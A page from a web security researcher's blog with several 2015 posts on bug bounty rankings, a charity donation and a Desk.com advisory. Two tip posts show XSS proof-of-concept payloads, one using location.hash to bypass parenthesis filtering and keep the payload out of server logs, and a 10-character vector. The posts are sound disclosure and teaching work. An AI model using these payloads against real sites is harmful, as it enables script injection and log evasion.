David Sopas

web security researcher

David Sopas – Web Security Researcher
START READING
06/08/15 Interesting Readings , News # , ,

Details on the Cross-Site Request Forgery Vulnerability Disclosed at Black Hat

no responses
06/08/15 Bug Bounty , Swag # , ,

First to reach 1000 rep score on Cobalt.io

First to reach 1000 rep score on Cobalt.io

Yes! I made it.

Since my registration on March this year I reached more than 1000 reputation points on Cobalt.io and become the first to do it.
Most of the points were made on private/invite only programs but a couple of them were also public in companies like Nexmo, Weebly, DoSomething and Circle.

My next goal? Keep having fun with the guys on Cobalt.io. They’ve a great team and are supported by many talented security researchers.

If you are a company who needs security checked by professionals just register your program.

no responses
06/08/15 Bug Bounty , Donations # , ,

Sharing is caring!

Sharing is caring!

I always try to help the local dogs and cats shelter with food and medications.
Some extra cash from bug bounties helped me to give more often so I try to do my best.

The reward is priceless! Dogs and cats that were abandoned with a better way of life.

Hope you guys do the same…

no responses
04/08/15 Tips and Tricks # ,

No parenteses allowed? location.hash is here

No parenteses allowed? location.hash is here

I come across a web application in a bounty private program that reflected my var – xss – with the following code:

var _s_tab = xss;
var _s_params = "";
var _s_autoScroll = true;
setTimeout("try { s_callAjax('search', ''); }
catch(ex) { setTimeout(\"s_callAjax('search', '');\", 2000);}", 50);

So what I tried next was to put a XSS vector in place:

</pre>
<pre>vuln-site/?t=xss;alert(1);//</pre>
<pre>

Which reflected:

var _s_tab = xss;alert1;//;

So it removed the () chars… I thought to myself – A Challenge!

My next step was to try something that I already used in a previous research.
Use location.hash and then execute my attack.

vuln-site/?t=1;document.body.innerHTML=location.hash#<img src=x onerror=prompt(1)>

The other good thing about this type of attack is that the payload is in part of the url hash and is therefore never sent to the server. (no servers logs of actual attack payload)

no responses
04/08/15 Tips and Tricks # ,

Tiny XSS vector

I needed a small XSS vector that could fit in a 10 char limit variable in a limit 10 char on a private client to show him that limiting chars on a variable is not secure…

central.push({ 'var1': 'INJECT_HERE' });

So after some attempts I was unable to find one so I called for help 🙂

@soaj1664ashar 10 char fun: ‘-open()-‘

Making a valid Javascript:

central.push({ 'var1': ''-open()-'' });

This XSS vector only opens a new tab/window but in my clients case it was stored in a cookie so it was a pain in the ass to close a window each time he navigated in his web application.

Nice catch!

no responses
03/08/15 News #

Exploits start against flaw

no responses
03/08/15 Bug Bounty , Swag # ,

I’m number 1 on Cobalt.io

I’m number 1 on Cobalt.io

Just checked the Hall of Fame of Cobalt.io and I’m now number 1 in the rank. Not bad for a portuguese guy that started in March.

Next objective… 1000 points! Let’s go!

2 responses
03/08/15 Advisories # , ,

Desk.com Reflected Filename Download

Desk.com Reflected Filename Download

Who is Desk.com?

Salesforce Desk.com help desk software offers small businesses an all-in-one customer service software solution that will help keep customers happy and loyal. Desk.com can be set up in just hours, and provides multi-channel support, including phone, email, self-help pages, and social media. Not only will this innovative help desk software let your agents more easily serve customers, your small business will have the insights needed to build better products and make smarter, growth-driving decisions.

– in http://www.salesforce.com/desk/overview/

Who uses Desk.com?

Continue reading

no responses
1 6 7 8 9 10